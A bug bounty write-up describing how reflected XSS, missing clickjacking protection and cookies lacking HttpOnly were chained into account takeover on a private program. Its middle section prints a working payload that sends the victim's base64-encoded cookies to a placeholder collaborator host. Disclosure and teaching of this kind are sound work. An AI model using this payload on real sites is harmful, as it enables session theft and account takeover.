Chain of Low Level Bugs and Misconfigurations Leads to Account Takeover
2021-03-10 19:21:27 Author:查看原文) 阅读量:257 收藏


Hello, fellow hunters. I am going to tell you a tale about one of my recent findings in which I was able to chain several misconfigurations that lead me to takeover any account. I am going to refer to the website as “” as it was a private program on HackerOne. Let’s get started.

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I was navigating through subdomains of my target, looking for interesting functionalities before getting deeper in the application. After a while, I stumbled upon a page that lets me search a blog post by its title. So, briefly it was a classical search box. I observed that every time I put some text in the search box, it was getting reflected to the URL as path:{TEXT_HERE}

As most of us would do, I immediately chucked several XSS payloads but there was no luck, my payloads were getting sanitized. It seemed like a custom bypass system, there were no signs of any WAF. That’s why I decided to dig deeper and tried to bypass the sanitization. After many trials and errors, when I replaced less than sign ‘<’ with its HTML entity form which is &lt; my payload got fired successfully.

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XSS Payload Got Fired Successfully

Everything seems to be working seamlessly right? Not really. I expected that the payload would fire when I clicked the link, but it did not. The search text was right there where I entered it, but it was not being fired. The victim had to manually click the “Search” button for the payload to be fired. I was going through my logs in Burp Suite and saw that a proper CSRF protection mechanism was in place. I tried to bypass it by trying numerous ways but I couldn’t manage to succeed. While going back and forth in my logs, I noticed that “X-Frame-Options” was missing which meant that the subdomain was vulnerable to clickjacking, which means that the site can be embedded on any site with an iframe.

It was all good, but the impact was not high enough. While thinking about ways of raising the impact, I realized that the cookies were missing HttpOnly flag, which meant that they were reachable by using JavaScript.

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I used this to append the cookie of the victim to the end of the URL as a query parameter. More details below. Final payload that I hosted on my website looked like this more or less:

<!DOCTYPE html>
<iframe src=;%20img%20src=x%20onerror=location.href=%22https:%26sol;%26sol;{COLLABORATOR_URL}%26sol;%26quest;q=%22+btoa(document.cookie);%26gt;>

The decoded version of the above URL:<img src=x onerror=location.href=”{COLLABORATOR_URL}/?q="+btoa(document.cookie);>

This step needs elaboration, though.

What is btoa()?

In JavaScript, btoa() is basically a method that encodes a string in base64. Why did I need this? Well, I wasn’t planning to. During the flight, I realized that I could not see the all cookies, because some characters in the cookies were being filtered. This way, when I checked my server logs, I was able to retrieve all the cookies in base64 encoded form.

Performing the Takeover

I am not going to give a detailed explanation on how to perform a clickjacking attack. It would be enough to understand that making a user to click a button is a piece of cake. When the button is clicked by the victim, we have the base64 value.

What now? Do I just decode the value, replace it with my cookies and the work is done? Indeed it is.

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  • When you manage to find a reflected XSS, try to escalate the severity by chaining it with other bugs (e.g. CSRF, cache poisoning etc.)
  • Low-level bugs and misconfigurations might play a critical role in increasing the impact even though they have nearly no value when reported on their own. Do not overlook them!

This was my first write-up. I hope you found this helpful.

You can follow me on Twitter. @pleorqy
